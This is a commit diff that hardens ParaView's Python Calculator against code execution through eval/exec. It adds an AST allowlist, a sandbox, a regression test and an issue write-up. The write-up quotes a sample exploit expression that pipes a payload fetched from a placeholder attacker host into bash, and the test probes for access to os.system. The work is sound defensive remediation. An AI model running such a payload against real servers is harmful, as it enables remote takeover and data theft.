Security: Harden Python Calculator (Issue Kitware#1)\n\n- Add optional secure mode via PARAVIEW_CALCULATOR_SECURE to restrict eval/exec\n- Whitelist AST nodes and constrain call targets to safe builtins/helpers/np funcs\n- Rework globals to safe sandbox (no leaked modules)\n- Secure multiline exec path reuses validator and sandbox\n- Add regression test PythonCalculatorSecurity.py and wire into CTest\n- Ignore local build/ dirs in .gitignore\n\nDocs: issues/issue1.md and security.md for background

garland3 · garland3 · commit 79b9c0d0604c · 2025-10-05T16:13:25.000Z
diff --git a/.gitignore b/.gitignore
@@ -7,3 +7,5 @@
 .ExternalData_SHA512_*
 .DS_Store
 CMakeUserPresets.json
+builds/
+build/
diff --git a/Remoting/Application/Testing/Python/CMakeLists.txt b/Remoting/Application/Testing/Python/CMakeLists.txt
@@ -14,6 +14,7 @@ vtk_module_test_data(
 set(PY_TESTS
   Animation.py
   AnimationCache.py,NO_VALID
+  PythonCalculatorSecurity.py,NO_VALID
   AxesGridTestGridLines.py
   BackgroundColorBackwardsCompatibilityTest.py,NO_VALID
   CellIntegrator.py,NO_VALID
diff --git a/Remoting/Application/Testing/Python/PythonCalculatorSecurity.py b/Remoting/Application/Testing/Python/PythonCalculatorSecurity.py
@@ -0,0 +1,47 @@
+"""
+Security regression test for Issue 1.
+
+Enables calculator secure mode and verifies that expressions cannot access
+dangerous builtins like __import__ or os.system via the Python Calculator.
+"""
+
+import os
+import sys
+
+# Ensure secure mode is active before importing ParaView modules that load the calculator
+os.environ["PARAVIEW_CALCULATOR_SECURE"] = "1"
+
+from paraview.simple import Sphere, PythonCalculator  # minimal imports
+
+# Create a simple data source (no rendering/show to avoid Rendering group deps)
+sphere = Sphere()
+
+# Create Python Calculator filter
+calc = PythonCalculator(Input=sphere)
+calc.Expression = "__import__('os').path is not None"  # benign attribute access
+
+# Force pipeline update to evaluate expression
+try:
+    UpdatePipeline()
+except Exception as e:
+    print('[INFO] Benign expression evaluation raised exception (unexpected pre-fix):', e)
+    # Still proceed to exploit attempt
+
+# Exploit attempt: Access to __import__('os').system should be blocked in secure mode
+calc2 = PythonCalculator(Input=sphere)
+calc2.Expression = "__import__('os').system is not None"  # Should NOT be allowed after fix
+
+vulnerable = False
+try:
+    UpdatePipeline()
+    # If we reach here without restriction, vulnerability present
+    vulnerable = True
+except Exception as e:
+    print('[INFO] Exception caught (potentially fixed state):', e)
+
+# Hard fail the test only if vulnerability is still present (pre-fix expected FAIL)
+if vulnerable:
+    print('[FAIL] Python Calculator allowed access to os.system via __import__ (Issue 1)')
+    sys.exit(1)
+else:
+    print('[PASS] Access to dangerous builtins blocked (post-fix behavior)')
diff --git a/Wrapping/Python/paraview/detail/calculator.py b/Wrapping/Python/paraview/detail/calculator.py
@@ -11,12 +11,200 @@
 import paraview
 import vtkmodules.numpy_interface.dataset_adapter as dsa
 from vtkmodules.numpy_interface.algorithms import *
+import vtkmodules.numpy_interface.algorithms as _alg
 # -- this will import vtkMultiProcessController and vtkMPI4PyCommunicator
 
 from paraview.vtk import vtkDataObject, vtkDoubleArray, vtkSelectionNode, vtkSelection, vtkStreamingDemandDrivenPipeline
 from paraview.modules import vtkPVVTKExtensionsFiltersPython
 from paraview.vtk.util.numpy_support import get_numpy_array_type
 import textwrap
+import os
+import ast
+
+# Optional secure mode: when PARAVIEW_CALCULATOR_SECURE is set to a truthy
+# value, expressions are validated using a conservative AST whitelist to
+# mitigate arbitrary code execution via the Python Calculator.
+_CALCULATOR_SECURE = os.environ.get("PARAVIEW_CALCULATOR_SECURE", "").lower() in ["1", "true", "yes", "on"]
+
+# A small allowlist of builtin functions considered safe/commonly used in
+# calculator expressions. This list can be extended cautiously.
+_SAFE_BUILTINS = {
+    'abs': abs,
+    'min': min,
+    'max': max,
+    'len': len,
+    'sum': sum,
+    'float': float,
+    'int': int,
+    'pow': pow,
+    'range': range,
+}
+
+# Allowlist of numpy functions accessible via np.<func> in secure mode
+_SAFE_NUMPY_FUNCS = {
+    'sin', 'cos', 'tan', 'arcsin', 'arccos', 'arctan',
+    'sinh', 'cosh', 'tanh',
+    'exp', 'log', 'log10', 'log1p', 'sqrt',
+    'abs', 'fabs', 'sign', 'clip', 'round', 'floor', 'ceil',
+    'minimum', 'maximum',
+    'where', 'select',
+    'mean', 'sum', 'prod', 'std', 'var',
+    'min', 'max',
+    'radians', 'degrees'
+}
+
+# Whitelisted AST node types for expressions. We intentionally exclude
+# Import/Attribute access starting with underscores, function/lambda
+# definitions, comprehensions that could leak scope, etc. This list is
+# deliberately tight; broaden only with a security review.
+_ALLOWED_AST_NODES = (
+    ast.Expression,
+    ast.BoolOp,
+    ast.BinOp,
+    ast.UnaryOp,
+    ast.IfExp,
+    ast.Compare,
+    ast.Call,
+    ast.Num,  # Py <3.8
+    ast.Constant,
+    ast.Name,
+    ast.Load,
+    ast.Attribute,
+    ast.Subscript,
+    ast.Slice,
+    ast.Tuple,
+    ast.List,
+    ast.Dict,
+    ast.Set,
+    ast.ListComp,
+    ast.SetComp,
+    ast.DictComp,
+    ast.GeneratorExp,
+    ast.comprehension,
+    ast.And,
+    ast.Or,
+    ast.Add,
+    ast.Sub,
+    ast.Mult,
+    ast.Div,
+    ast.FloorDiv,
+    ast.Mod,
+    ast.Pow,
+    ast.USub,
+    ast.UAdd,
+    ast.Eq,
+    ast.NotEq,
+    ast.Lt,
+    ast.LtE,
+    ast.Gt,
+    ast.GtE,
+    ast.Is,
+    ast.IsNot,
+    ast.In,
+    ast.NotIn,
+)
+
+_DISALLOWED_NAMES = {"__import__", "eval", "exec", "open", "input", "compile", "globals", "locals", "vars"}
+
+
+def _collect_safe_helpers():
+    """Collect a conservative set of helper functions/names that are allowed
+    in secure mode expressions. This includes algorithms.* functions and
+    numpy under np/numpy aliases; excludes dangerous modules like os."""
+    helpers = {}
+    # algorithms functions
+    try:
+        for _name in dir(_alg):
+            if _name.startswith('_'):
+                continue
+            _obj = getattr(_alg, _name)
+            if callable(_obj):
+                helpers[_name] = _obj
+    except Exception:
+        # If introspection fails, fall back to empty set (safer)
+        pass
+    # numpy shortcuts
+    helpers['np'] = np
+    helpers['numpy'] = np
+    # selected safe helpers from this module
+    for _name in ('pointIsNear', 'cellContainsPoint'):
+        if _name in globals() and callable(globals()[_name]):
+            helpers[_name] = globals()[_name]
+    return helpers
+
+
+def _build_safe_globals():
+    g = {"__builtins__": _SAFE_BUILTINS}
+    g.update(_collect_safe_helpers())
+    return g
+
+
+def _validate_ast(tree):
+    allowed_call_names = set(_SAFE_BUILTINS.keys()) | set(_collect_safe_helpers().keys())
+    for node in ast.walk(tree):
+        if not isinstance(node, _ALLOWED_AST_NODES):
+            raise ValueError("Expression contains disallowed construct: %s" % type(node).__name__)
+        # Disallow any Name that is clearly unsafe
+        if isinstance(node, ast.Name):
+            if node.id in _DISALLOWED_NAMES or node.id.startswith('_'):
+                raise ValueError("Use of disallowed name '%s' in expression" % node.id)
+        # Disallow attribute access to dunder/private attributes
+        if isinstance(node, ast.Attribute):
+            if node.attr.startswith('_'):
+                raise ValueError("Access to private attribute '%s' not allowed" % node.attr)
+        # Constrain function call targets
+        if isinstance(node, ast.Call):
+            fn = node.func
+            if isinstance(fn, ast.Name):
+                if fn.id not in allowed_call_names:
+                    raise ValueError("Call to disallowed function '%s'" % fn.id)
+            elif isinstance(fn, ast.Attribute):
+                # Allow attribute calls only on numpy aliases (np / numpy)
+                if not isinstance(fn.value, ast.Name) or fn.value.id not in {"np", "numpy"}:
+                    raise ValueError("Method calls are not allowed in secure mode")
+                if fn.attr.startswith('_'):
+                    raise ValueError("Access to private attribute '%s' not allowed" % fn.attr)
+                if fn.attr not in _SAFE_NUMPY_FUNCS:
+                    raise ValueError("Call to disallowed numpy function '%s'" % fn.attr)
+            else:
+                raise ValueError("Unsupported callable in expression")
+    return True
+
+
+def _validate_exec_block(tree: ast.AST):
+    """Validate a multiline exec block: allow only simple assignments, bare
+    expressions, and a final return, with each expression validated via
+    _validate_ast. Reject any other statements."""
+    if not isinstance(tree, ast.Module):
+        raise ValueError("Invalid multiline block")
+    for stmt in tree.body:
+        if isinstance(stmt, ast.Return):
+            # Validate return value expression
+            if stmt.value is None:
+                continue
+            _validate_ast(ast.Expression(stmt.value))
+        elif isinstance(stmt, ast.Assign):
+            # Validate assigned value only; names are checked by expression validator
+            _validate_ast(ast.Expression(stmt.value))
+        elif isinstance(stmt, ast.Expr):
+            # Bare expression line
+            if stmt.value is not None:
+                _validate_ast(ast.Expression(stmt.value))
+        else:
+            raise ValueError("Disallowed statement in secure multiline expression: %s" % type(stmt).__name__)
+
+
+def safe_eval(expression, eval_globals, eval_locals):
+    """Evaluate an expression safely using a restricted AST whitelist.
+
+    This does NOT guarantee perfect safety but blocks the most direct RCE
+    primitives (e.g., __import__, dunder attribute traversal, eval/exec)."""
+    tree = ast.parse(expression, mode='eval')
+    _validate_ast(tree)
+    # Provide a restricted builtin dict
+    # Ignore passed-in globals in secure mode to avoid leaking modules
+    g = _build_safe_globals()
+    return eval(compile(tree, filename='<calculator-secure>', mode='eval'), g, eval_locals)
 
 
 def get_arrays(attribs, controller=None):
@@ -143,24 +331,38 @@ def compute(inputs, expression, ns=None, multiline=False):
         pass
 
     if multiline:
-        # Wrap multiline expressions returning a value in a function, and evaluate it.
-        if "return" not in expression:
-            raise ValueError(
-                "Multiline expression does not contain a return statement.")
-
-        multilineFunction = f'def func():\n' \
-                            f'{textwrap.indent(expression, " " * 4)}\n' \
-                            f'result = func()\n'
-        returnValueDict = {}
-
-        # `mylocals` need to be in the global `exec` scope, otherwise it would not be accessible inside the `func` scope
-        exec(multilineFunction, dict(globals(), **mylocals), returnValueDict)
-
-        return returnValueDict['result']
+        if _CALCULATOR_SECURE:
+            # Validate the entire exec block and every expression within
+            tree = ast.parse(expression, mode='exec')
+            _validate_exec_block(tree)
+            multilineFunction = f'def func():\n' \
+                                f'{textwrap.indent(expression, " " * 4)}\n' \
+                                f'result = func()\n'
+            returnValueDict = {}
+            g = _build_safe_globals()
+            # Expose dataset variables into the function's globals
+            g.update(mylocals)
+            exec(multilineFunction, g, returnValueDict)
+            return returnValueDict['result']
+        else:
+            # Original insecure path
+            if "return" not in expression:
+                raise ValueError(
+                    "Multiline expression does not contain a return statement.")
+
+            multilineFunction = f'def func():\n' \
+                                f'{textwrap.indent(expression, " " * 4)}\n' \
+                                f'result = func()\n'
+            returnValueDict = {}
+            exec(multilineFunction, dict(globals(), **mylocals), returnValueDict)
+            return returnValueDict['result']
     else:
         finalRet = None
-        for subEx in expression.split(' and '):  # Used in 'extract_selection' to find data matching multiple criteria
-            retVal = eval(subEx, globals(), mylocals)
+        for subEx in expression.split(' and '):
+            if _CALCULATOR_SECURE:
+                retVal = safe_eval(subEx, None, mylocals)
+            else:
+                retVal = eval(subEx, globals(), mylocals)
             if finalRet is None:
                 finalRet = retVal
             else:
@@ -250,7 +452,7 @@ def execute(self, expression, multiline=False):
                 vtkRet = retVal.astype(get_numpy_array_type(self.GetResultArrayType()))
             else:
                 # we can also get a scalar, convert to single element array of correct type
-                vtkRet = numpy.asarray(retVal, get_numpy_array_type(self.GetResultArrayType()))
+                vtkRet = np.asarray(retVal, get_numpy_array_type(self.GetResultArrayType()))
 
         # by default, use filter ArrayAssociation for output attribute.
         outputAttribute = output.GetAttributes(self.GetArrayAssociation())
diff --git a/issues/issue1.md b/issues/issue1.md
@@ -0,0 +1,69 @@
+# Issue 1: Arbitrary Code Execution via Python Calculator
+
+**Severity:** High (CVSS ~8.6 AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)
+**Location:** `Wrapping/Python/paraview/detail/calculator.py` (`compute()` + multiline path using `eval` and `exec`)
+
+## Description
+User-supplied expressions are evaluated with Python's `eval()` (and `exec()` for multiline) using a namespace that merges globals and dataset arrays. This grants broad access to Python builtins and modules, enabling arbitrary code execution if an untrusted or semi-trusted user can submit an expression (e.g., through ParaViewWeb, shared remote sessions, or scripted pipelines).
+
+## Exploitation Scenario
+An authenticated but low-privilege user connected to a ParaViewWeb session enters an expression:
+```
+__import__('os').system('curl https://attacker/payload | bash')
+```
+This executes shell commands on the server hosting ParaView.
+
+## Impact
+Full compromise of the ParaView server process: data exfiltration, lateral movement, execution of arbitrary binaries, tampering with in-memory visualization data, pivoting into HPC cluster nodes.
+
+## Root Cause
+Unrestricted dynamic code evaluation for convenience without a security boundary or privilege layer.
+
+## Recommendations
+1. Implement a restricted expression evaluator:
+   - Parse with `ast.parse` and allow only safe nodes (`BinOp`, `UnaryOp`, `BoolOp`, `Compare`, `Name`, `Subscript`, `Attribute` with whitelist, `Call` on vetted math/array functions).
+   - Reject any `Import`, `Exec`, `Lambda`, `ClassDef`, `FunctionDef`, `Attribute` chains resolving to dunder names.
+2. Provide a hardened deployment flag (e.g., `PARAVIEW_CALCULATOR_SECURE=1`) that disables dynamic evaluation entirely or limits it to a predeclared function set.
+3. Remove dangerous builtins from the evaluation environment: supply `{'__builtins__': {}}` and selectively re-add safe math functions.
+4. Document security posture: expression evaluation is unsafe with untrusted users.
+5. Add regression tests ensuring attempts to access `__import__`, `open`, or `os` raise errors.
+6. (Optional) Sandbox execution in a separate subprocess with a time & memory limit; communicate results via IPC.
+
+## Remediation Example (Outline)
+```python
+import ast
+ALLOWED_NODES = {ast.Expression, ast.BinOp, ast.UnaryOp, ast.Num, ast.Constant, ast.Name,
+                 ast.Load, ast.BoolOp, ast.Compare, ast.operator, ast.boolop, ast.cmpop,
+                 ast.Subscript, ast.Slice, ast.Index, ast.Attribute, ast.Call, ast.List,
+                 ast.Tuple}
+ALLOWED_FUNCS = { 'sin', 'cos', 'sqrt', 'min', 'max' }
+
+class SafeVisitor(ast.NodeVisitor):
+    def generic_visit(self, node):
+        if type(node) not in ALLOWED_NODES:
+            raise ValueError(f"Disallowed syntax: {type(node).__name__}")
+        if isinstance(node, ast.Attribute) and node.attr.startswith('__'):
+            raise ValueError('Dunder attribute blocked')
+        if isinstance(node, ast.Call):
+            if isinstance(node.func, ast.Name) and node.func.id not in ALLOWED_FUNCS:
+                raise ValueError('Function not allowed')
+        super().generic_visit(node)
+
+def safe_eval(expr, vars):
+    tree = ast.parse(expr, mode='eval')
+    SafeVisitor().visit(tree)
+    code = compile(tree, '<expr>', 'eval')
+    return eval(code, {'__builtins__': {}}, vars)
+```
+
+## Acceptance Criteria
+- Supplying dangerous expressions returns a clear error message.
+- All existing legitimate calculator expressions still function (add regression test coverage for representative examples).
+- Config flag exists to disable evaluation for hardened deployments.
+
+## Follow-Up / Defense-in-Depth
+- Usage analytics to detect abnormal expression patterns.
+- Audit logging of rejected expressions.
+
+---
+Prepared: 2025-10-03
diff --git a/security.md b/security.md